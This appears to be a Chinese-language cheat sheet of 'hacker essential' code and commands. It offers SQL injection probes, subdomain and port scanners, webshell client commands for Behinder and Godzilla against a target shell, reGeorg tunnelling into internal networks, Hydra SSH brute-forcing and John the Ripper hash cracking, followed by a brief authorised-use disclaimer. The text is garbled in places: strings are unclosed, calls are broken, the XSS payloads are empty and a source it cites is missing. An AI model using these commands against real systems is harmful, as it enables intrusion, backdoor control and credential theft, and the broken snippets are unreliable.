以下整理的黑客必备免费中文代码合集及实战技巧,整合了渗透测试、漏洞利用、信息收集等场景的实用代码片段及工具使用指南,适用于学习研究和合法授权测试场景,请严格遵守网络安全法律法规。
一、基础漏洞检测代码
1. SQL注入检测
sql
http://url/list.php?id=1 and 1=1-
http://url/list.php?id=1 and 1=2-
手动检测数据库注入漏洞的经典代码,结合工具如 `sqlmap` 可自动化利用。
2. XSS漏洞测试
html
-
-
二、信息收集与扫描脚本
1. 子域名爆破(Python示例)
python
import requests
for sub in open("subdomains.txt"):
url = f"http://{sub}.target.com
try:
response = requests.get(url)
if response.status_code == 200:
print(f"Found: {url}")
except:
pass
结合工具如 `Sublist3r` 或 `Amass` 可自动化枚举。
2. 端口扫描(Python集成)
python
import socket
target = "192.168.1.1
for port in range(1, 1025):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((target, port))
if result == 0:
print(f"Port {port} is open")
sock.close
高级版推荐工具 `nmap`:`nmap -sV -p 1-1000 target.com`。
三、系统操作与伪装代码
1. CMD命令合集(必备)
bash
shutdown -s -t 600 600秒后关机(管理员权限)
systeminfo | findstr /B /C:"OS Name" 获取系统信息
netstat -ano | findstr "ESTABLISHED" 查看活跃网络连接
更多CMD命令见网页43整理的系统管理指令。
2. 自动化渗透报告生成
工具 `Savior` 可一键生成渗透测试报告,支持中英文模板。
四、Web渗透与后门管理
1. Webshell连接(冰蝎/哥斯拉)
bash
冰蝎客户端启动(需密钥)
java -jar Behinder.jar --key [加密密钥] --url http://target/shell.php
哥斯拉静态免杀Webshell
/godzilla -t http://target/shell.jsp -p password
支持动态加密流量绕过检测。
2. 内网穿透代理
使用 `reGeorg` 建立HTTP隧道:
bash
python reGeorgSocksProxy.py -p 8080 -u http://target/tunnel.php
结合 `Proxychains` 实现内网扫描。
五、密码破解与漏洞利用
1. Hydra暴力破解SSH
bash
hydra -l admin -P passwords.txt ssh://192.168.1.1
支持协议包括FTP、RDP、MySQL等。
2. John The Ripper破解Hash
bash
john --format=md5crypt hashes.txt MD5破解
john --wordlist=rockyou.txt hashes.txt 字典攻击
适用Windows/Linux系统密码提取。
六、技巧与工具推荐
1. 黑客界面模拟
2. 自动化工具整合
注意事项
1. 合法授权:所有代码及工具仅限授权测试或学习,非法使用需承担法律责任。
2. 防御建议:企业可通过部署WAF、定期更新补丁、关闭冗余端口防范攻击。
3. 学习资源:推荐Kali Linux系统及靶场(如封神台、OWASP靶机)进行实练。
如需完整工具包或代码库,可访问GitHub项目 [birdhan/SecurityTools](https://github.com/birdhan/SecurityTools) 或 [awesome-chatgpt-prompts-cybersecurity](https://github.com/sechelper/awesome-chatgpt-prompts-cybersecurity) 获取持续更新的资源。
